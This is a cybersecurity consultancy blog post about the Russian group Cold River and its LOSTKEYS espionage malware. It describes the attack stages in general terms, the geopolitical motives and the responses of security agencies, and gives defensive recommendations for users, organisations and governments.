In the complex board of modern geopolitics, war is no longer fought solely on the battlefield. Conflicts in the 21st century have evolved into cyberspace, where networks, servers, and emails have ceased to be mere communication tools, becoming the new front lines of combat.
Cyberwarfare, a new dimension of international conflicts, is increasingly present on the agendas of governments and global security institutions. A clear example of this evolution is the recent revelation made by Google’s security team, which uncovered a sophisticated cyber espionage campaign carried out by the Russian group Cold River.
The campaign used a newly developed malware named LOSTKEYS, which represents not only a technical threat in terms of cybersecurity but also a warning about how cyber operations can influence global politics, public opinion, and international security. Below, ITD Consulting explains the details about the LOSTKEYS malware.
Who is Cold River?
Cold River, also known by other aliases such as Star Blizzard, UNC4057, or Callisto Group, is a cyber-espionage group with strong ties to the Russian government, particularly to the Federal Security Service (FSB), Russia’s main intelligence and security agency. This group has been actively operating since at least 2016, and its activities have mainly targeted high-value espionage targets in the West, including governments, intelligence agencies, military institutions, universities, NGOs, journalists, and more recently, organizations related to Ukraine.
What distinguishes Cold River from other cybercriminal groups is its strategic approach. Unlike actors seeking immediate financial gain by stealing personal or financial data, Cold River’s primary goal is to obtain sensitive and strategic information that can be used to support the interests of the Kremlin. Cold River’s activity has primarily focused on gathering political, economic, and military intelligence, with particular emphasis on geopolitical conflicts involving Russia, especially its conflict with Ukraine and its tense relations with Western nations.
Over the years, Cold River has used a wide variety of cyber espionage tools, but the emergence of the LOSTKEYS malware has further elevated its profile. LOSTKEYS is a testament to the level of sophistication and customization that Cold River has achieved in its operations, raising global concerns about the implications of cyberwarfare on international security and stability.
LOSTKEYS: A Malware Designed for Surgical Espionage
The LOSTKEYS malware, discovered by Google between January and April 2025, is an outstanding example of how state actors can use cyber tools in a targeted and surgical manner to gain access to highly sensitive information. Unlike other forms of malware, such as ransomware or banking trojans, which are designed to affect a large number of users en masse, LOSTKEYS is used selectively, with the aim of compromising specific individuals or entities.
Cold River has designed this malware with a precise focus, targeting key individuals in governments, armed forces, intelligence sectors, media outlets, and NGOs involved in highly geopolitically sensitive matters. One of the most interesting aspects of LOSTKEYS is its customization capability.
Each attack using LOSTKEYS appears to be specifically tailored to the selected victim, making it much harder to detect and mitigate its effects. Moreover, LOSTKEYS employs a series of advanced evasion and obfuscation techniques to avoid detection by traditional security systems, making it an extremely dangerous tool.
Stages of the LOSTKEYS Attack
The attack carried out using the LOSTKEYS malware follows a series of carefully orchestrated steps that combine social engineering, advanced evasion techniques, and exploitation of vulnerabilities in computer systems. These are the main phases of a LOSTKEYS attack:
1. Highly Targeted Phishing
Cold River uses a highly sophisticated phishing technique to deceive its victims. The phishing emails are designed to look legitimate, using real and detailed context, such as recent conferences or specific professional links. These emails include links to spoofed websites that accurately mimic genuine government or academic pages. The trust generated by these emails increases the success of the LOSTKEYS attack.
2. CAPTCHA Simulation and Hidden Activation
When the user clicks on the link in the email, they are redirected to a fake site that presents an apparently harmless CAPTCHA form. This form aims to trick the user into completing it, which activates a hidden script that copies malicious code to the user’s clipboard. By performing this step, the LOSTKEYS malware is triggered without the victim noticing.
3. Execution via PowerShell
In this step, the user, believing they are completing a legitimate process, executes a PowerShell command—a Windows system administration tool. This command downloads and installs the LOSTKEYS malware onto the victim’s system, leaving no visible traces or notifications.
4. Persistence and Concealment
Once installed, the LOSTKEYS malware hides within legitimate system processes, such as svchost.exe, and sets up scheduled tasks to ensure its persistence. LOSTKEYS also employs advanced obfuscation techniques to make detection by traditional antivirus tools more difficult.
5. Information Theft and Exfiltration
Once activated, LOSTKEYS begins scanning the system for sensitive information such as confidential documents, access credentials, browsing histories, and other strategically valuable data. This information, extracted by LOSTKEYS, is then sent to remote servers controlled by Cold River, which are constantly rotated to avoid tracking.
What Sets LOSTKEYS Apart from Other Threats
While there are thousands of malicious programs in circulation, LOSTKEYS stands out from many others due to several key factors that make it a high-level strategic threat:
Extreme Customization: Unlike many malicious programs, LOSTKEYS is not generic malware. Each instance of LOSTKEYS appears to be specifically designed for the chosen target, meaning Cold River has invested significant resources to tailor the attack to each victim’s unique characteristics.
Use of Legitimate Infrastructure: To avoid detection, Cold River uses legitimate cloud services such as Dropbox, Google Drive, or Amazon S3 to host and distribute the LOSTKEYS malware. This use of legitimate infrastructure greatly complicates the task of defenders, as conventional security filters often struggle to identify these threats.
Advanced Evasion Tactics: LOSTKEYS is capable of detecting if it is being executed in an analysis environment, such as a sandbox, and can deactivate itself to avoid detection. This advanced evasion tactic makes malware detection and mitigation much more difficult.
Long-Term Campaign: Unlike many cyberattacks that seek immediate results, Cold River’s goal with LOSTKEYS is to establish a persistent presence on victims’ systems, allowing for continuous data theft over weeks or even months.
Geopolitical Objectives Behind the Attack
The use of the LOSTKEYS malware cannot be understood without considering the political context in which it takes place. Since Russia’s invasion of Ukraine in 2022, cyberattacks have played a fundamental role in the Russian strategy to weaken Ukrainian infrastructure and undermine Western support for Ukraine.
In this context, cyber espionage has become a key tool for obtaining sensitive information about the plans of Western governments and international policies. The targets selected by Cold River in the LOSTKEYS campaign have often been key figures capable of influencing global politics, such as diplomats critical of the Kremlin, academics influential in matters of economic sanctions, energy security experts, and internationally visible journalists.
By gaining access to the personal and professional information of these individuals through the use of LOSTKEYS, Russia can anticipate political decisions, manipulate public opinion, or design more effective disinformation campaigns.
Impact of LOSTKEYS on International Cybersecurity
The discovery of LOSTKEYS has triggered a strong reaction among major cybersecurity agencies worldwide, which have issued alerts and reinforced their defenses against potential attacks of this type. Among the main responses are:
- Google: Has blocked more than 100 domains related to Cold River and implemented security alerts for potential victims.
- Microsoft: Has strengthened its early warning systems to detect unusual access to institutional accounts.
- NCSC (UK) and CISA (USA): These agencies have issued recommendations to governments and private organizations to reinforce their defense systems against cyber threats.
- NATO: Has intensified its efforts in shared cyber intelligence, as several of its officials were targeted in these attacks.
What Risks Does It Pose to the Average User?
Although LOSTKEYS has primarily been used against high-value targets, its methods could be adopted by other actors, posing significant risks to ordinary users and organizations around the world. The risks of LOSTKEYS include:
Identity Theft: Data stolen by LOSTKEYS could be used to create fake identities or manipulate the personal information of public figures.
Leak of Confidential Information: Sensitive information obtained by LOSTKEYS could be used for political or economic manipulation.
Malware Reuse: Other malicious actors could adapt LOSTKEYS for their own purposes, creating broader variants affecting a larger number of users.
Chain Attacks: A system compromised by LOSTKEYS could be used as an entry point to infect other networks and institutions.
Cybersecurity Recommendations
Below are some measures that individual users, companies, and governments can adopt to reduce the risk of infections by malware such as LOSTKEYS:
For Individual Users:
- Avoid Clicking on Suspicious Links: Always verify the domain of emails requesting authentication or password changes.
- Enable Multi-Factor Authentication (MFA): This additional layer of security can block many attacks even if credentials are stolen.
- Avoid Copying and Pasting Commands into PowerShell or Terminals: This technique was key in the deployment of LOSTKEYS.
- Keep Software and Antivirus Up to Date: Keeping the operating system, browsers, and antivirus software up to date is essential for defending against cyber threats.
- Set Up Security Alerts: Many email platforms, like Gmail or Outlook, allow for configuring notifications for unusual login activity.
For Organizations:
- Implementar soluciones EDR (Endpoint Detection & Response): Estas herramientas ayudan a detectar comportamientos anómalos en dispositivos y redes.
- Monitor Outbound Traffic: Identifying connections to suspicious or unrecognized servers can help detect an attack in its early stages.
- Regular Staff Training: Awareness about phishing and cybersecurity is crucial for preventing attacks.
- Review Access and Privilege Policies: Apply the principle of least privilege to limit the damage in the event of a breach.
- Conduct Regular Security Audits: Preferably, these audits should be carried out by external firms to obtain an impartial evaluation of the infrastructure.
For Governments and Public Bodies:
- Develop National Cyber Defense Infrastructure: Governments must strengthen their capacity to defend against advanced threats and support vulnerable private entities.
- Active International Collaboration: Real-time intelligence sharing is crucial to effectively detect and neutralize cyber threats.
- Clear Legislation on International Cyberattacks: Establish clear legal frameworks to define responsibilities and response mechanisms for cyberattacks.
- Cyber Crisis Simulations: Drills should involve key sectors such as energy, health, and defense to improve preparedness for large-scale attacks.
LOSTKEYS is not just sophisticated malware: it is a reflection of a profound transformation in how nation-states conduct intelligence operations and conflict. Throughout history, espionage has been a fundamental tool for understanding the intentions and capabilities of adversaries.
However, in the 21st century, this activity has found a new domain of action in cyberspace, where geographical barriers disappear and attacks can be executed remotely, stealthily, and with global impact. The existence of threats like LOSTKEYS demonstrates that governments are willing to invest in offensive cyber capabilities not only as defensive tools but also as strategic instruments to shape the international environment to their advantage.
This new dimension of conflict, based on information manipulation, unauthorized access to critical systems, and the destabilization of key actors, presents an unprecedented challenge to the international community. Unlike traditional attacks, cyberattacks are difficult to attribute with certainty, which complicates diplomatic and military responses.
Moreover, the effects of a campaign like Cold River’s are not limited to technical damage: they can influence political decisions, disrupt democratic processes, and undermine public trust in key institutions. Digital espionage, therefore, is not just a technological issue—it is a comprehensive threat that must be addressed from multiple angles: legal, diplomatic, military, and, above all, cultural.
Cold River and tools like LOSTKEYS will continue to evolve as the conflict between global powers intensifies. Public and private organizations that fail to adapt to this new reality risk becoming vulnerable to actors who not only seek to steal data but also to interfere with their strategic operations.
Cybersecurity can no longer be seen as a mere technical function delegated to an IT department; it must become a cross-cutting priority, integrated at all levels of decision-making. Only a culture of prevention, constant vigilance, and international collaboration will allow nations and their institutions to withstand the emerging threats of contemporary digital espionage.
If you want to learn more about cyber threats like LOSTKEYS and how to protect yourself, write to us at [email protected]. We have a team of experts ready to advise you and provide the best cybersecurity solutions tailored to your needs.
EN 
ES